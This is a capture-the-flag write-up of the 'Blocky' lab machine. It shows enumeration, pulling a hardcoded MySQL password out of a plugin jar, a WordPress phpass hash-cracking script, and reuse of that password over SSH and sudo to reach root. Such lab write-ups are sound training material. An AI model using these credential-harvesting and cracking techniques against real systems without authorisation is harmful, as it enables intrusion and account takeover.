Blocky

OS: Linux, Difficulty: Easy, IP: 10.10.10.37

Initial enumeration

# Nmap 7.80 scan initiated Sat Sep 28 23:30:25 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 22,21,80,25565 10.10.10.37
Nmap scan report for 10.10.10.37
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
25565/tcp open minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.4 (92%), Linux 4.8 (92%), Linux 3.16 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 240.30 ms 10.10.14.1
2 240.22 ms 10.10.10.37
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 28 23:30:49 2019 -- 1 IP address (1 host up) scanned in 25.06 seconds

The web server on port 80 is running a near-default WordPress 4.8 install (see the http-generator header above). Nothing stood out on the front page, so I ran gobuster to brute-force directories and files.

/wiki (Status: 301)
/wp-content (Status: 301)
/index.php (Status: 301)
/wp-login.php (Status: 200)
/plugins (Status: 301)
/license.txt (Status: 200)
/wp-includes (Status: 301)
/javascript (Status: 301)
/wp-trackback.php (Status: 200)
/wp-admin (Status: 301)
/phpmyadmin (Status: 301)
/wp-signup.php (Status: 302)
/server-status (Status: 403)

/wiki and /plugins seemed interesting. The wiki held nothing but a note; /plugins, however, was a directory listing with 2 jar files in it.

BlockyCore.jar looked like the more promising of the two, so I pulled it down and extracted its contents. A jar is just a zip archive, so unzip is enough:

$ unzip BlockyCore.jar -d output
$ ls -laR ./output
.:
total 16
drwxr-xr-x 4 jtnydv jtnydv 4096 Sep 30 18:31 .
drwxr-xr-x 5 jtnydv jtnydv 4096 Sep 30 18:31 ..
drwxr-xr-x 3 jtnydv jtnydv 4096 Sep 30 18:31 com
drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 META-INF
./com:
total 12
drwxr-xr-x 3 jtnydv jtnydv 4096 Sep 30 18:31 .
drwxr-xr-x 4 jtnydv jtnydv 4096 Sep 30 18:31 ..
drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 myfirstplugin
./com/myfirstplugin:
total 12
drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 .
drwxr-xr-x 3 jtnydv jtnydv 4096 Sep 30 18:31 ..
-rw-r--r-- 1 jtnydv jtnydv 939 Jul 2 2017 BlockyCore.class
./META-INF:
total 12
drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 .
drwxr-xr-x 4 jtnydv jtnydv 4096 Sep 30 18:31 ..
-rw-r--r-- 1 jtnydv jtnydv 25 Jul 2 2017 MANIFEST.MF

BlockyCore.class was the only interesting file in the tree, so I disassembled its bytecode with javap to get something readable. String literals show up in the constant pool and are loaded with ldc, so hardcoded secrets are visible without a full decompiler:

$ javap -c BlockyCore.class
--- SNIP ---
public com.myfirstplugin.BlockyCore();
  Code:
     0: aload_0
     1: invokespecial #12   // Method java/lang/Object."<init>":()V
     4: aload_0
     5: ldc           #14   // String localhost
     7: putfield      #16   // Field sqlHost:Ljava/lang/String;
    10: aload_0
    11: ldc           #18   // String root
    13: putfield      #20   // Field sqlUser:Ljava/lang/String;
    16: aload_0
    17: ldc           #22   // String 8YsqfCTnvxAUeduzjNSXe22
    19: putfield      #24   // Field sqlPass:Ljava/lang/String;
    22: return
--- SNIP ---

That gives us credentials for the MySQL server: root:8YsqfCTnvxAUeduzjNSXe22. They worked against the /phpmyadmin interface found by gobuster, and from the wp_users table I recovered the WordPress username notch along with its password hash.
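Doing the same thing without javap, as an added example that is not part of the original write-up: the script below reads the JVM class-file constant pool directly (JVMS section 4.4), lists every string literal that ldc could load, and flags long high-entropy literals and identifiers whose names suggest a secret. The jar it scans is constructed in memory; the class name com/example/FakePlugin, the field name sqlPass and the password value are made up for the demo, and the entropy/length thresholds are a heuristic, not a standard.

```python
"""Pull string literals out of every .class inside a jar and flag likely secrets.

Added example for this write-up, not the author's tooling. The sample jar is
built in memory; its class name, field name and password are invented.
"""
import io
import math
import re
import struct
import zipfile

# Byte size of each fixed-width constant-pool entry, keyed by tag (JVMS 4.4).
FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
         15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
SECRET_NAME = re.compile(r"pass|pwd|secret|token|cred|apikey|api_key", re.I)


def parse_constant_pool(data: bytes):
    """Return (utf8_by_index, indices of CONSTANT_String entries) for one class file."""
    magic, _minor, _major, count = struct.unpack(">IHHH", data[:10])
    if magic != 0xCAFEBABE:
        raise ValueError("not a class file")
    pos, i = 10, 1
    utf8, strings = {}, []
    while i < count:
        tag = data[pos]
        pos += 1
        if tag == 1:                        # CONSTANT_Utf8: u2 length + bytes
            (n,) = struct.unpack(">H", data[pos:pos + 2])
            utf8[i] = data[pos + 2:pos + 2 + n].decode("utf-8", "replace")
            pos += 2 + n
        else:
            if tag == 8:                    # CONSTANT_String: u2 index of a Utf8 entry
                strings.append(struct.unpack(">H", data[pos:pos + 2])[0])
            pos += FIXED[tag]
        i += 2 if tag in (5, 6) else 1      # Long/Double occupy two pool slots
    return utf8, strings


def shannon_entropy(s: str) -> float:
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s))


def scan_class(data: bytes):
    """String literals (what `ldc` loads) plus identifiers whose names hint at secrets."""
    utf8, strings = parse_constant_pool(data)
    literals = [utf8[idx] for idx in strings]
    hints = sorted(v for v in utf8.values() if SECRET_NAME.search(v) and "/" not in v)
    return literals, hints


def suspicious(literals, min_len=12, min_entropy=3.0):
    """Long, high-entropy literals are the ones worth trying as credentials (heuristic)."""
    return [s for s in literals if len(s) >= min_len and shannon_entropy(s) >= min_entropy]


def scan_jar(jar_bytes: bytes):
    """Map each .class in the jar to (literals, secret-ish identifiers, flagged literals)."""
    out = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as z:
        for name in z.namelist():
            if name.endswith(".class"):
                lits, hints = scan_class(z.read(name))
                out[name] = (lits, hints, suspicious(lits))
    return out


# --- constructed sample: a minimal class file with a tell-tale constant pool ---
SAMPLE_PASSWORD = "Xk9vQ2pLmT7rW4zBn"  # made-up value, not the box's password


def _utf8(s): return b"\x01" + struct.pack(">H", len(s)) + s.encode()
def _string(idx): return b"\x08" + struct.pack(">H", idx)


def build_sample_jar() -> bytes:
    cp = [_utf8("com/example/FakePlugin"), b"\x07\x00\x01",               # 1, 2: name, Class
          _utf8("sqlPass"), _utf8("localhost"), _string(4),               # 3, 4, 5
          _utf8(SAMPLE_PASSWORD), _string(6), _utf8("root"), _string(8),  # 6..9
          b"\x05" + struct.pack(">q", 1234567890123)]                     # 10 (+11): Long
    body = struct.pack(">IHHH", 0xCAFEBABE, 0, 52, 12) + b"".join(cp)
    body += struct.pack(">HHHHHHH", 0x21, 2, 2, 0, 0, 0, 0)   # flags, this, super, empty tables
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("com/example/FakePlugin.class", body)
    return buf.getvalue()


if __name__ == "__main__":
    for cls, (lits, hints, flagged) in scan_jar(build_sample_jar()).items():
        print(cls, "literals:", lits, "hints:", hints, "flagged:", flagged)
```

On a real target you would feed it every jar from /plugins: `scan_jar(open("BlockyCore.jar", "rb").read())`. Only CONSTANT_String entries are reported as literals, so class and method names (which also live in the pool as Utf8) do not drown out the interesting values; the regex over all Utf8 entries is what surfaces a field called sqlPass next to them.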

I tried cracking notch's WordPress password hash, but it was not in the rockyou.txt wordlist, so I set that aside and instead tried the usernames and passwords I already had (root, notch, and the MySQL password) against the SSH server.
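What that cracking attempt actually does under the hood, as an added example that is not part of the original post: WordPress stores phpass "portable" hashes in wp_users.user_pass (the `$P$B...` format, hashcat mode 400), and the script below re-implements that scheme so a hash can be checked against a wordlist offline. The demo hash, salt AbCdEfGh, the password blocky2017 and the five-entry stand-in for rockyou.txt are all constructed here.

```python
"""Check and wordlist-crack WordPress (phpass "$P$") password hashes.

Added example for this write-up, not tooling from the original post. The
salt, passwords and wordlist below are constructed for the demo.
"""
import hashlib
import secrets
from typing import Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(raw: bytes) -> str:
    """phpass's own base64 variant: 3 bytes -> 4 chars, little-endian, no padding."""
    out, i, n = [], 0, len(raw)
    while i < n:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_crypt(password: str, setting: str) -> str:
    """Hash `password` under the 12-char setting "$P$" + count char + 8-char salt."""
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    count = 1 << ITOA64.index(setting[3])   # iteration count is stored as log2
    salt = setting[4:12].encode()
    pw = password.encode()
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(count):                  # stretching: md5(prev || password), `count` times
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest)


def phpass_hash(password: str, count_log2: int = 13, salt: Optional[str] = None) -> str:
    """Make a fresh hash; count_log2=13 ('B', 8192 rounds) is what WordPress emits."""
    if salt is None:
        salt = "".join(secrets.choice(ITOA64) for _ in range(8))
    return phpass_crypt(password, "$P$" + ITOA64[count_log2] + salt)


def phpass_check(password: str, stored: str) -> bool:
    return secrets.compare_digest(phpass_crypt(password, stored), stored)


def crack(stored: str, wordlist) -> Optional[str]:
    """First wordlist entry that matches, or None (the 'not in rockyou' outcome)."""
    for candidate in wordlist:
        if phpass_check(candidate, stored):
            return candidate
    return None


# Constructed demo: a hash we generated ourselves and a tiny stand-in for rockyou.txt.
DEMO_HASH = phpass_hash("blocky2017", salt="AbCdEfGh")
DEMO_WORDLIST = ["123456", "password", "minecraft", "blocky2017", "notch"]

if __name__ == "__main__":
    print(DEMO_HASH)
    print("cracked:", crack(DEMO_HASH, DEMO_WORDLIST))
    print("not in list:", crack(phpass_hash("not-in-any-wordlist-xyz"), DEMO_WORDLIST))
```

Every candidate costs 8193 MD5 calls, which is why a real run goes through hashcat or john rather than Python; the value of the reimplementation is seeing that the salt and round count are in the hash itself, so a stolen wp_users row is all an attacker needs to start guessing offline.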

$ ssh root@10.10.10.37
root@10.10.10.37's password:
Permission denied, please try again.
root@10.10.10.37's password:
# The MySQL password didn't work for root over SSH, however it did
# work for notch
$ ssh notch@10.10.10.37
notch@10.10.10.37's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
7 packages can be updated.
7 updates are security updates.
Last login: Mon Sep 30 07:40:07 2019 from 10.10.14.10
notch@Blocky:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

User own

notch@Blocky:~$ cat /home/notch/user.txt; echo
59fee***

Root own

We know notch's password and `id` shows notch is in the sudo group (and lxd, which is another route to root on its own), so the obvious next step was to check what sudoers allows:

notch@Blocky:~$ sudo -l
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

So we are effectively root: (ALL : ALL) ALL means notch may run any command as any user and any group, and because we already have notch's password the sudo prompt is no obstacle. This is game over.

notch@Blocky:~$ sudo cat /root/root.txt; echo
0a969***

Learning outcome

Thorough enumeration is the key to these machines: I nearly missed trying the user notch with the password recovered for the MySQL root account. Keeping track of every username and password you find, and trying each combination against every service, is important while pentesting, because credentials are reused across services far more often than they should be.